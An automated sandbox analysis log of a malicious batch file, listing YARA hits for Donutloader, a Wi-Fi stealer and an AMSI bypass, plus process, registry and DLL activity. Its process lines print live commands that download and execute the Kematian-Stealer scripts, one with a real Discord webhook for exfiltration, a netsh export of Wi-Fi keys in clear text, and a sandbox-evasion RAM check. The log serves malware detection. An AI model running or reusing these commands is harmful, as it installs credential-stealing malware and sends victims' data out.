Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.16.123.96:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.7:49720 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.7:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49723 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.7:49725 version: TLS 1.2

      Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7696, type: MEMORYSTR

      System Summary

Source: amsi64_7696.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_7696.amsi.csv, type: OTHER | Matched rule: Detects PowerShell PoshWiFiStealer Author: ditekSHen
Source: sslproxydump.pcap, type: PCAP | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000022.00000002.2017068494.000001DF1C3C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000022.00000002.1852694281.000001DF13ACC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000022.00000002.1817228535.000001DF03E22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000022.00000002.1852694281.000001DF13F87000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7696, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7696, type: MEMORYSTR | Matched rule: Detects AMSI bypass pattern Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7696, type: MEMORYSTR | Matched rule: Detects PowerShell PoshWiFiStealer Author: ditekSHen
Source: thegreatestexecutor.bat | Static file information: 3533346
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_000001DF1C78D4BF NtCreateSection,NtMapViewOfSection,NtUnmapViewOfSection,NtMapViewOfSection
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_000001DF1C78D4DC NtMapViewOfSection
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_00007FFAAC5010FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_000001DF1C78D4BF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_000001DF1C78DEB0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_000001DF1D312380
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_000001DF1D2D1BC0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_000001DF1D2DA3C0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_000001DF1D2CDA00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_000001DF1D2DE280
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_000001DF1D2EA540
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_000001DF1D2C55E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_000001DF1D2E1C80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_000001DF1D2FC740
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_000001DF1D2E91E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_000001DF1D2C7860
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_000001DF1D30C880
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_000001DF1D2DE8C0
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: amsi64_7696.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_7696.amsi.csv, type: OTHER | Matched rule: MALWARE_Win_PWSH_PoshWiFiStealer author = ditekSHen, description = Detects PowerShell PoshWiFiStealer
Source: sslproxydump.pcap, type: PCAP | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000022.00000002.2017068494.000001DF1C3C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000022.00000002.1852694281.000001DF13ACC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000022.00000002.1817228535.000001DF03E22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000022.00000002.1852694281.000001DF13F87000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7696, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7696, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_AMSI_Bypass author = ditekSHen, description = Detects AMSI bypass pattern
Source: Process Memory Space: powershell.exe PID: 7696, type: MEMORYSTR | Matched rule: MALWARE_Win_PWSH_PoshWiFiStealer author = ditekSHen, description = Detects PowerShell PoshWiFiStealer
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winBAT@41/53@5/6
Source: C:\Windows\System32\cmd.exe | File created: C:\Users\user\Desktop\kdotzASik.bat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6128:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jcs3himz.ui1.ps1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\da47f2f14fb1f90922d6d87924aada220dc001776e323526b0f1c3bc763a6b7fAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\thegreatestexecutor.bat" "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\System32\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\rundll32.exe rundll32
Source: powershell.exe, 00000022.00000002.2055247149.000001DF1CB60000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: powershell.exe, 00000022.00000002.2055247149.000001DF1CB60000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: powershell.exe, 00000022.00000002.2055247149.000001DF1CB60000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: powershell.exe, 00000022.00000002.2055247149.000001DF1CB60000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: powershell.exe, 00000022.00000002.2055247149.000001DF1CB60000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: powershell.exe, 00000022.00000002.2055247149.000001DF1CB60000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: powershell.exe, 00000022.00000002.2055247149.000001DF1CB60000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\thegreatestexecutor.bat" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -c "Write-Host -NoNewLine $null"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -c "Write-Host -NoNewLine $null"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\rundll32.exe rundll32
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net session
Source: C:\Windows\System32\net.exe | Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mshta.exe mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0))
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user~1\AppData\Local\Temp\wifi key=clear
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1'))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESA945.tmp" "c:\Users\user\AppData\Local\Temp\bekownh2\CSCE31222C310BD40CB8ED0AE4A3AB63C88.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1'))
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\chcp.com | Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com | Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
